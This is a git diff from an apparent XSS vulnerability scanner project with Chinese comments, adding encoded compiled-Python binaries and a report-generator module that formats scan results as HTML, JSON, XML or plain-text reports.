z-gkUJv5q0Oj-+iz0Lm##!D71zm9(>Y9dvHzCZ@V?&n+Bl8<c$z`o*cAo}!0c^tgu|
zoM87%(ydca-YaXn($@Z-?j7CVcYmP#h32Ok`r$|D<Bzh3M%kXn*ftlvXAHo`WgS;K
zy51XkXXJmGJ~;A=;hzrEM<?j1$JzcT*av-V$28sUhi(c$my~3e16#ARmCx#Lm@sqw
zW*e4S1bjivmS-xz()S4|!^-WOkH|1>9+WA9bfs1~uiw;Ts%%KetG%VcZ1#w?gRyo*
ztX+(?i?wz~tbL5NkM4hrwYqL-m3d>bO^wPUQ{K>O^8kZZ1yTUrh-b||vDCa$@S(PG
z_2H;SyP!U!UevE?cKlX>;Z0~H8h@*X*qXMH`}j17mh+!C<P7K(|DeMMiquJdSjcY%
zX<9d95P&x~g#0rkL?rKYo>1aBIdXkTd0@mKwGJL947NJCUp@lfUi<^+;|fwqs<`v<
zJ9=XeSCSc|n$+x7!b!On{ga%O<F`2}$KxmEI_XJyFF82CyDk16oRp&rCKh>27kB*U
zmPKx5>wyevKMD>&@G&}3KLCIkUcVbo=wf=0KNzMwqpsk%*E?{;l0h9tut=ex`cZ%`
z1yIPd25vEgr)Mlm$$|-s9y+t89)s*4EI`~+#jj4tgMmVUANnrnh6v}kSV%+)YM6qW
zNP(3pu(Abpk%B!;!5+HpFk8?UH5K1bDY7!=4&2fwOXwAienI<;c5&x&*XsTcHI8ki
z6gg{MD(EsReq_eGYLkT&<#9r~0^%dRav%twAMUB76Hag`1m9&lDhm(trXE6#O?muE
zNEZb&kqPb?aq;!5oT?%5rb_|>%B68K8$lzEdxpfAkOB^IhD2P53GEmX9l3-YSfxZS
zWPuvtO<>>-nT{&a$qgXVw@icpH^THdG9<Nt`{hCTAsRTS-Ugot?bkRn($XY4H*QN)
z!r4#@ZgA<^m6qG!OewmzNw@}+g)l`3EfL;8fhH|}Z32SSI@QQ!)O7~ij)x*NxIw1J
zCvkHG_f5`GGM(qT(EH$238Oa*1AXRFdOkaK0)_reXJ*<qq~*~_fxwxB%aMRdcmr4P
zv=~K~LU7iERY8Zr6pY`IJ7U}YS=(?YOH#9%#L@ckd(EA!yXKCL=Z+iZ9dJ{7d0Poe
z^rm4O9vPB&q(eO7+%_QsPG#xGw&+ym&vqKp(wr^9YP<u_|L5IHq{JmrKY}g`aE~ww
z1y?rL1n@(DhgxCnLgT=n<2R*mr87rpgFn}qo3@pA8VM!=L+TqwLi(|lD?q|XAmfgP
zmTh3~RJ+(q0#4x#wP&Yok8~XVoUa|E3lumsA`i;@Sw1!*Ix~Wbl}Toi22RDwbLI_+
z&WS?baFSV`_!45Ik<8vJDsM2}k!!wq-v=BJb8e$@<-}DkQy82v1?R+J;ilUEe~oJ(
zmLs`(8NVDtjRCC`(#3c!>2oO7h=L9XV%i|w+#E%&MpP3@Y(|NhX#X!bE1sr$P==_l
z&B_VFBBPN01XdCXsUWeeamoV*j-J3cm^wg(Gq~fi{rt7ySSAl3eCl}9N;h&)5egpx
zGs{2#9G?!O>Jr*sFZx7_CV#Om1I3U|!>fTvn@3iX8Ojq1ora4tmVAjesPw|c<d_1e
zi76>KEajLH)5kqVM?F9tg&2aARCINTO96D8PbUA7B{GNyhwEY(7)X$-Kun1c@UELd
z9vbH?Cp_dM2$Hw4aB%8icx)8eVzem2W6+=|N5*3S9Yjj4Xj4gw@G2|;`4kGi4EkHJ
zA9xQcY(AzZSY7#C4{VEch6uic!FMdVX|Rk`vG{#+-BDduL|4k_N;wEqek7-o$*ElK
zXLFk74o8)Sh_ZxHmMnEg%yo>p?u}EC`umys`y=%|Onnbqe;`sn$kY$g4~?_+Zr1Es
zQ%*#cnus!&QRXg=tSQT(*4%=KsfsaGEgxe|^>clR{NroNimRMaC%-6?zl+J=wW4A3
z8|QUk|A=S^Mnf!@tZ8h3qM$e>-xSf5fr(^U!P^B^Ti<rP<+wQYft+nV%o2TTn*OLp
zfYGgKtbjvbz}+N@?jRyN>X;pMD^IdJ_RSAO^#u`qB^X_n2iEk>AC*=uk1(Z;k<vX(
z>7L7_d(YyFiYQdiZ30$IY=Lc288zlcj06KVCR3!mnJI6+(0x($y<WEbzBS|hQDbSu
zSj!k|S6VI`8*ZqvG6!sc^@U5V&<oKbbEK%2DXLv*XN%hAdlQxSuIcMh<;R)QrbuZU
zQ`&a9)bSZAFOC>@GDc)IGFnmP`%vXOmNPEvc8ZnLyP@`uEwvYx(q#?5ENp}Zn#&?)
z8)LSu1Xy$DqBd$2(4Jm1HhxsW*}Gn~p6y-ij+T^0N~}zYb%kV08W(%66qGMlzmXd$
zsACH1K5E+Y_U^ZKe;-iQEgf7w7Tr}F+11AEYP(p#?&?}P6g5{x%ngjWVbv6A>}DFf
z!B(OD$pG6(u9=TS%|yg(Wz5!<;mhXMPt;iR{W7rL743)=)-Z)NE2fBLA7j~fsr!A^
zyS=RC;9B9KXzq?ku7%09tW;gjt-qCrRo36qVnt0i_RGNVc56bGyh#(x2#Rxtvxeo+
zqJcJALEg6AtD#-ZKa`XWDips^;Dg!8n>92z(QJ2f7L=4f-0T8Qz;#h!aTk>!a7X{c
z%`Sl}aM$L)%+0Q5gY?#x>sO#c-QmvGq5mFNq0x=4V(!LP$u>8(%xQ0I?GRLG*dV?X
z$Mw&EtCYJ(RkqDN9U^g$2KZaC4OC?kRMj?6)k#o0w}IM~1XVMVhh!f;+rV2A@DfR=
z-3D56Qw!Q--3H2*zzI-w&Ds3DoPPKT5~L>gf55-F`$6^M{h)?B+z%4B&wP7OC~Vqq
ze?JIlXlz!*?*=6<mdnT{vYBk*6mtV?(!@Jg3H*tTI;h{NcZ2M=QNQhR^}AK7ejgb=
z@_S?OM21Yt3c&!cV2cVhcQ!{M#!|>nEBs>!@Q%BF@VF+J_N0?PD7_bKIDf**JG0@o
zyMFK#zcy+QYKsxIC4OcroYV5#4dmz+hUEaVC5~s5110xC0PbdZyyUfaU%vk4EB8W+
z)aMD#(|JE82`!>u8ShQT=Onv}QJj;QBuDfDqv{cjh)^I<@}oZY!sVC@r;wd()@Hev
zc2USZVOEY;&Sv1?yW$|I`yheatA)`f2<M4}^!wo}j7+X^5_vZj$mm2F94!276L_XT
zQkR&-yG1|}Qgvo=JnrED2@fC`4xiLl0W!J~q#Vb?RS?1N=nVjXsJeUMRr<qzBqMlQ
znNOVV-%Bki``9CvEb0(cK|P29ZkGur2aMl-qPqFR25#qx&a<gO6d-ZoH>Y69!6>x-
zv=|dRP716i7<B{%P86U+dFm(%xP3R;JW|I{fHsHJ2n4X(gdcK<pS)9_N6C+(;4uh-
zsJ5hSAbjvU!EywHf`|;@Cb^y9ACB7Z<)~d<V1y&>?7VZ@v)ZLytg(VNRKj^_mGPfG
zKlz*{Vk~Ej<q=~&W2|4rS>wKlv4=7C(EEqijK}C{iZ%oRI3$Au>VhQ&t%vht<qjj9
zhi98<b2DRXp$&EbXf=Yb!qOmPw9*C}eAjW`1B`JuZLq?(4SmyQsHK56Gy;w$*=BjJ
zNjZ1;->lMO@yp_|cmb3mWKkJDr<>pV9J!SD>?4bPa7bGY$KnbzoTn<_So|;?9rMTH
zm*dCc#u6x3C6CG#b0&zXGNKvy(^F4P&4(Aq*o-1tRSc;m+Nd^jq3}%M;_fAi)mG3N
zjw6Ps!L)Gd%&8@O`2p6ji_WS6Sc?d2Th3v%RkWrWQg>>vXv>zBuW4S<tQ4(2z!G~{
zZ5yrG3t0|4if1j<oT*vdyEMk)<+Qc}QY!`IG;H`PSc8qus)N?l%Qmxd0$PJ-E5D&b
zKigIRNhUgb-ic{*H!(#aYA75%>tMgAGD3mE{Hyt;ya^$aznjV5&F0%8`K?TTE4`<e
z%|A@%0h1K{aLTPx<w9YV3V3|Wn0~tm_5|~7_lQ5s&gr!(erCmc9cr+J<-j-uhavUo
zC|H_CM=7Ka@duP@^vf*ZPsF?aAj?+F07j}hcVM~>uFHAh&0Em4;9S(l{fY}!fl71p
zOfHJmq5wJ7aA%jC^@khyuVXhM5q{GTf|#a#I^Yh2hZpq>e8QA~1<{1FsgTKJH#BmY
z@}>rp;lILkzrwP((D08~!$(?UL|go!ws@(7)mr8<K2hprg`b%9vg%vrGFjdy56B)>
c%8Z}fug!z7?jf1Xc+(BPktZ`!X8`yA1w2q)4gdfE

literal 0
HcmV?d00001

diff --git a/xss_scanner/reporters/report_generator.py b/xss_scanner/reporters/report_generator.py
new file mode 100644
index 0000000..8be7635
--- /dev/null
+++ b/xss_scanner/reporters/report_generator.py
@@ -0,0 +1,581 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+报告生成器模块，负责生成扫描结果报告
+"""
+
+import os
+import json
+import logging
+import html
+import datetime
+from xml.dom.minidom import getDOMImplementation
+
+logger = logging.getLogger('xss_scanner')
+
+def format_details_for_txt(details):
+    """
+    格式化漏洞详情为文本格式
+    
+    Args:
+        details: 漏洞详情，可能是字符串或字典
+        
+    Returns:
+        str: 格式化后的漏洞详情文本
+    """
+    if isinstance(details, dict):
+        return '\n  '.join([f"{k}: {v}" for k, v in details.items()])
+    return str(details)
+
+def format_details_for_html(details):
+    """
+    格式化漏洞详情为HTML格式
+    
+    Args:
+        details: 漏洞详情，可能是字符串或字典
+        
+    Returns:
+        str: 格式化后的HTML内容
+    """
+    if isinstance(details, dict):
+        return '<br>'.join([f"<strong>{html.escape(str(k))}:</strong> {html.escape(str(v))}" for k, v in details.items()])
+    return html.escape(str(details))
+
+def generate_report(results, output_file, format_type='html'):
+    """
+    生成扫描报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+        format_type: 报告格式 (html, json, xml, txt)
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 创建输出目录（如果不存在）
+    output_dir = os.path.dirname(output_file)
+    if output_dir and not os.path.exists(output_dir):
+        os.makedirs(output_dir)
+    
+    try:
+        if format_type == 'html':
+            return generate_html_report(results, output_file)
+        elif format_type == 'json':
+            return generate_json_report(results, output_file)
+        elif format_type == 'xml':
+            return generate_xml_report(results, output_file)
+        elif format_type == 'txt':
+            return generate_txt_report(results, output_file)
+        else:
+            logger.error(f"不支持的报告格式: {format_type}")
+            return False
+    except Exception as e:
+        logger.error(f"生成报告时发生错误: {str(e)}")
+        return False
+
+def generate_html_report(results, output_file):
+    """
+    生成HTML格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 合并所有结果的统计信息
+    total_stats = {
+        'pages_scanned': 0,
+        'forms_tested': 0,
+        'parameters_tested': 0,
+        'vulnerabilities_found': 0
+    }
+    
+    all_vulnerabilities = []
+    targets = []
+    start_time = None
+    total_time = 0
+    
+    for result in results:
+        targets.append(result['target'])
+        
+        # 更新统计信息
+        for key in total_stats:
+            if key in result['statistics']:
+                total_stats[key] += result['statistics'][key]
+        
+        # 收集所有漏洞
+        all_vulnerabilities.extend(result['vulnerabilities'])
+        
+        # 计算总扫描时间
+        if result.get('start_time') and result.get('end_time'):
+            total_time += (result['end_time'] - result['start_time'])
+        
+        # 记录最早的开始时间
+        if start_time is None or (result.get('start_time') and result['start_time'] < start_time):
+            start_time = result.get('start_time')
+    
+    # 按漏洞类型分组
+    vuln_by_type = {}
+    for vuln in all_vulnerabilities:
+        vuln_type = vuln['type']
+        if vuln_type not in vuln_by_type:
+            vuln_by_type[vuln_type] = []
+        vuln_by_type[vuln_type].append(vuln)
+    
+    # 生成HTML报告
+    html_content = f"""<!DOCTYPE html>
+<html lang="zh-CN">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>XSS深度漏洞扫描报告</title>
+    <style>
+        body {{
+            font-family: "Segoe UI", Arial, sans-serif;
+            line-height: 1.6;
+            color: #333;
+            max-width: 1200px;
+            margin: 0 auto;
+            padding: 20px;
+            background-color: #f9f9f9;
+        }}
+        .container {{
+            background-color: #fff;
+            border-radius: 8px;
+            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
+            padding: 20px;
+            margin-bottom: 30px;
+        }}
+        h1, h2, h3, h4 {{
+            color: #2c3e50;
+            margin-top: 20px;
+        }}
+        h1 {{
+            text-align: center;
+            color: #3498db;
+            border-bottom: 2px solid #3498db;
+            padding-bottom: 10px;
+            margin-bottom: 30px;
+        }}
+        .header-info {{
+            display: flex;
+            justify-content: space-between;
+            flex-wrap: wrap;
+        }}
+        .header-info div {{
+            flex: 1;
+            min-width: 250px;
+            margin: 10px;
+        }}
+        table {{
+            width: 100%;
+            border-collapse: collapse;
+            margin: 20px 0;
+        }}
+        th, td {{
+            border: 1px solid #ddd;
+            padding: 12px;
+            text-align: left;
+        }}
+        th {{
+            background-color: #f2f2f2;
+            font-weight: bold;
+        }}
+        tr:nth-child(even) {{
+            background-color: #f9f9f9;
+        }}
+        .severity-high {{
+            color: #e74c3c;
+            font-weight: bold;
+        }}
+        .severity-medium {{
+            color: #f39c12;
+            font-weight: bold;
+        }}
+        .severity-low {{
+            color: #3498db;
+            font-weight: bold;
+        }}
+        .stats-container {{
+            display: flex;
+            flex-wrap: wrap;
+            justify-content: space-between;
+            margin-bottom: 20px;
+        }}
+        .stat-box {{
+            flex: 1;
+            min-width: 200px;
+            background-color: #fff;
+            border-radius: 8px;
+            box-shadow: 0 0 5px rgba(0, 0, 0, 0.1);
+            padding: 15px;
+            margin: 10px;
+            text-align: center;
+        }}
+        .stat-value {{
+            font-size: 24px;
+            font-weight: bold;
+            color: #3498db;
+            margin: 10px 0;
+        }}
+        .stat-label {{
+            font-size: 14px;
+            color: #7f8c8d;
+        }}
+        .vuln-details {{
+            background-color: #f8f9fa;
+            border-left: 4px solid #3498db;
+            padding: 12px;
+            margin: 10px 0;
+            border-radius: 0 4px 4px 0;
+        }}
+        .no-vulns {{
+            text-align: center;
+            color: #27ae60;
+            font-size: 18px;
+            padding: 20px;
+            background-color: #e8f8f5;
+            border-radius: 5px;
+            margin: 20px 0;
+        }}
+        .footer {{
+            text-align: center;
+            margin-top: 30px;
+            padding-top: 20px;
+            border-top: 1px solid #eee;
+            color: #7f8c8d;
+        }}
+    </style>
+</head>
+<body>
+    <div class="container">
+        <h1>XSS深度漏洞扫描报告</h1>
+        
+        <div class="header-info">
+            <div>
+                <h3>扫描信息</h3>
+                <p><strong>目标网站：</strong> {', '.join(targets)}</p>
+                <p><strong>扫描时间：</strong> {datetime.datetime.fromtimestamp(start_time).strftime('%Y-%m-%d %H:%M:%S') if start_time else 'N/A'}</p>
+                <p><strong>总耗时：</strong> {total_time:.2f}秒</p>
+            </div>
+            <div>
+                <h3>扫描范围</h3>
+                <p><strong>扫描页面：</strong> {total_stats['pages_scanned']}</p>
+                <p><strong>测试表单：</strong> {total_stats['forms_tested']}</p>
+                <p><strong>测试参数：</strong> {total_stats['parameters_tested']}</p>
+            </div>
+        </div>
+        
+        <div class="stats-container">
+            <div class="stat-box">
+                <div class="stat-label">发现漏洞</div>
+                <div class="stat-value">{total_stats['vulnerabilities_found']}</div>
+            </div>
+            <div class="stat-box">
+                <div class="stat-label">页面扫描</div>
+                <div class="stat-value">{total_stats['pages_scanned']}</div>
+            </div>
+            <div class="stat-box">
+                <div class="stat-label">表单测试</div>
+                <div class="stat-value">{total_stats['forms_tested']}</div>
+            </div>
+            <div class="stat-box">
+                <div class="stat-label">参数测试</div>
+                <div class="stat-value">{total_stats['parameters_tested']}</div>
+            </div>
+        </div>
+    </div>
+
+    <div class="container">
+        <h2>漏洞详情</h2>
+"""
+    
+    if all_vulnerabilities:
+        for vuln_type, vulns in vuln_by_type.items():
+            html_content += f"""
+        <h3>{vuln_type} 漏洞 ({len(vulns)})</h3>
+        <table>
+            <tr>
+                <th>#</th>
+                <th>URL</th>
+                <th>参数</th>
+                <th>漏洞级别</th>
+                <th>描述</th>
+            </tr>
+"""
+            
+            for i, vuln in enumerate(vulns, 1):
+                severity_class = ""
+                if vuln.get('severity') == '高':
+                    severity_class = "severity-high"
+                elif vuln.get('severity') == '中':
+                    severity_class = "severity-medium"
+                else:
+                    severity_class = "severity-low"
+                    
+                html_content += f"""
+            <tr>
+                <td>{i}</td>
+                <td>{html.escape(vuln.get('url', ''))}</td>
+                <td>{html.escape(vuln.get('parameter', ''))}</td>
+                <td class="{severity_class}">{html.escape(vuln.get('severity', ''))}</td>
+                <td>{html.escape(vuln.get('description', ''))}</td>
+            </tr>
+            <tr>
+                <td colspan="5">
+                    <div class="vuln-details">
+                        <p><strong>详情：</strong> {format_details_for_html(vuln.get('details', ''))}</p>
+                        <p><strong>Payload：</strong> {html.escape(str(vuln.get('payload', '')))}</p>
+                        <p><strong>修复建议：</strong> {html.escape(str(vuln.get('recommendation', '')))}</p>
+                    </div>
+                </td>
+            </tr>
+"""
+            
+            html_content += """
+        </table>
+"""
+    else:
+        html_content += """
+        <div class="no-vulns">
+            <p>恭喜！未发现任何漏洞。</p>
+        </div>
+"""
+    
+    html_content += """
+    </div>
+    
+    <div class="footer">
+        <p>扫描报告生成时间：""" + datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S') + """</p>
+        <p>XSS深度漏洞扫描器 v1.0.0</p>
+    </div>
+</body>
+</html>
+"""
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        f.write(html_content)
+    
+    return True
+
+def generate_json_report(results, output_file):
+    """
+    生成JSON格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 添加报告生成时间
+    report = {
+        'report_time': datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),
+        'results': results
+    }
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        json.dump(report, f, indent=2, ensure_ascii=False)
+    
+    return True
+
+def generate_xml_report(results, output_file):
+    """
+    生成XML格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    impl = getDOMImplementation()
+    
+    # 创建文档和根元素
+    doc = impl.createDocument(None, "xss_scanner_report", None)
+    root = doc.documentElement
+    
+    # 添加报告生成时间
+    report_time = doc.createElement("report_time")
+    report_time.appendChild(doc.createTextNode(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
+    root.appendChild(report_time)
+    
+    # 添加结果
+    results_elem = doc.createElement("results")
+    root.appendChild(results_elem)
+    
+    for result in results:
+        result_elem = doc.createElement("result")
+        results_elem.appendChild(result_elem)
+        
+        # 添加目标
+        target_elem = doc.createElement("target")
+        target_elem.appendChild(doc.createTextNode(result.get('target', '')))
+        result_elem.appendChild(target_elem)
+        
+        # 添加扫描信息
+        if 'scan_info' in result:
+            scan_info_elem = doc.createElement("scan_info")
+            result_elem.appendChild(scan_info_elem)
+            
+            for key, value in result['scan_info'].items():
+                elem = doc.createElement(key)
+                elem.appendChild(doc.createTextNode(str(value)))
+                scan_info_elem.appendChild(elem)
+        
+        # 添加统计信息
+        if 'statistics' in result:
+            stats_elem = doc.createElement("statistics")
+            result_elem.appendChild(stats_elem)
+            
+            for key, value in result['statistics'].items():
+                elem = doc.createElement(key)
+                elem.appendChild(doc.createTextNode(str(value)))
+                stats_elem.appendChild(elem)
+        
+        # 添加漏洞
+        if 'vulnerabilities' in result:
+            vulns_elem = doc.createElement("vulnerabilities")
+            result_elem.appendChild(vulns_elem)
+            
+            for vuln in result['vulnerabilities']:
+                vuln_elem = doc.createElement("vulnerability")
+                vulns_elem.appendChild(vuln_elem)
+                
+                for key, value in vuln.items():
+                    elem = doc.createElement(key)
+                    if isinstance(value, dict):
+                        # 处理嵌套字典
+                        for sub_key, sub_value in value.items():
+                            sub_elem = doc.createElement(sub_key)
+                            sub_elem.appendChild(doc.createTextNode(str(sub_value)))
+                            elem.appendChild(sub_elem)
+                    else:
+                        elem.appendChild(doc.createTextNode(str(value)))
+                    vuln_elem.appendChild(elem)
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        f.write(doc.toprettyxml(indent="  "))
+    
+    return True
+
+def generate_txt_report(results, output_file):
+    """
+    生成TXT格式的报告
+    
+    Args:
+        results: 扫描结果列表
+        output_file: 输出文件路径
+    
+    Returns:
+        bool: 是否成功生成报告
+    """
+    # 合并所有结果的统计信息
+    total_stats = {
+        'pages_scanned': 0,
+        'forms_tested': 0,
+        'parameters_tested': 0,
+        'vulnerabilities_found': 0
+    }
+    
+    all_vulnerabilities = []
+    targets = []
+    start_time = None
+    total_time = 0
+    
+    for result in results:
+        targets.append(result['target'])
+        
+        # 更新统计信息
+        for key in total_stats:
+            if key in result['statistics']:
+                total_stats[key] += result['statistics'][key]
+        
+        # 收集所有漏洞
+        all_vulnerabilities.extend(result['vulnerabilities'])
+        
+        # 计算总扫描时间
+        if result.get('start_time') and result.get('end_time'):
+            total_time += (result['end_time'] - result['start_time'])
+        
+        # 记录最早的开始时间
+        if start_time is None or (result.get('start_time') and result['start_time'] < start_time):
+            start_time = result.get('start_time')
+    
+    # 按漏洞类型分组
+    vuln_by_type = {}
+    for vuln in all_vulnerabilities:
+        vuln_type = vuln['type']
+        if vuln_type not in vuln_by_type:
+            vuln_by_type[vuln_type] = []
+        vuln_by_type[vuln_type].append(vuln)
+    
+    # 生成TXT报告
+    txt_content = f"""
+==========================================
+       XSS深度漏洞扫描报告
+==========================================
+
+扫描信息
+------------------------------------------
+目标网站：{', '.join(targets)}
+扫描时间：{datetime.datetime.fromtimestamp(start_time).strftime('%Y-%m-%d %H:%M:%S') if start_time else 'N/A'}
+总耗时：{total_time:.2f}秒
+
+扫描统计
+------------------------------------------
+发现漏洞：{total_stats['vulnerabilities_found']}
+扫描页面：{total_stats['pages_scanned']}
+测试表单：{total_stats['forms_tested']}
+测试参数：{total_stats['parameters_tested']}
+
+漏洞详情
+==========================================
+"""
+    
+    if all_vulnerabilities:
+        for vuln_type, vulns in vuln_by_type.items():
+            txt_content += f"""
+{vuln_type} 漏洞 ({len(vulns)})
+------------------------------------------
+"""
+            
+            for i, vuln in enumerate(vulns, 1):
+                txt_content += f"""
+#{i}
+URL: {vuln.get('url', '')}
+参数: {vuln.get('parameter', '')}
+漏洞级别: {vuln.get('severity', '')}
+描述: {vuln.get('description', '')}
+详情: {format_details_for_txt(vuln.get('details', ''))}
+Payload: {vuln.get('payload', '')}
+修复建议: {vuln.get('recommendation', '')}
+
+"""
+    else:
+        txt_content += """
+恭喜！未发现任何漏洞。
+
+"""
+    
+    txt_content += f"""
+==========================================
+报告生成时间：{datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}
+XSS深度漏洞扫描器 v1.0.0
+==========================================
+"""
+    
+    # 写入文件
+    with open(output_file, 'w', encoding='utf-8') as f:
+        f.write(txt_content)
+    
+    return True 
\ No newline at end of file
diff --git a/xss_scanner/scanners/__init__.py b/xss_scanner/scanners/__init__.py
new file mode 100644
index 0000000..483c699
--- /dev/null
+++ b/xss_scanner/scanners/__init__.py
@@ -0,0 +1 @@
+"""XSS扫描器 - 扫描器模块包""" 
\ No newline at end of file
diff --git a/xss_scanner/scanners/__pycache__/__init__.cpython-313.pyc b/xss_scanner/scanners/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..1216055f1b9f4acce3ee7c0275158e02d60f2371
GIT binary patch
literal 222
zcmey&%ge<81Uq!krfUG{#~=<2FhUuhIe?6*48aUV4C#!TOr?rIZbWeKv(DAe`um^G
zT%n+=0B1j2vGD2K=}&uF{WKYGvB$@!<R{0+uVnZPGU}F>vsFxJacWU<jFGvaky(sO
zetBL_equ^-4A8jv;N---ywoDy+{Dbhn2O@!_+p4a43sX8iI30B%PfhH*DI*J#bJ}1
fpHiBWYFEStG#cd8VvsXGFf%eT-eOQMVgYghj7CNN

literal 0
HcmV?d00001

diff --git a/xss_scanner/scanners/__pycache__/csrf_scanner.cpython-313.pyc b/xss_scanner/scanners/__pycache__/csrf_scanner.cpython-313.pyc
new file mode 100644
index 0000000000000000000000000000000000000000..fc162e51a1cb59885a1384ce43ff7fd211df3d4b
GIT binary patch
literal 7178
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
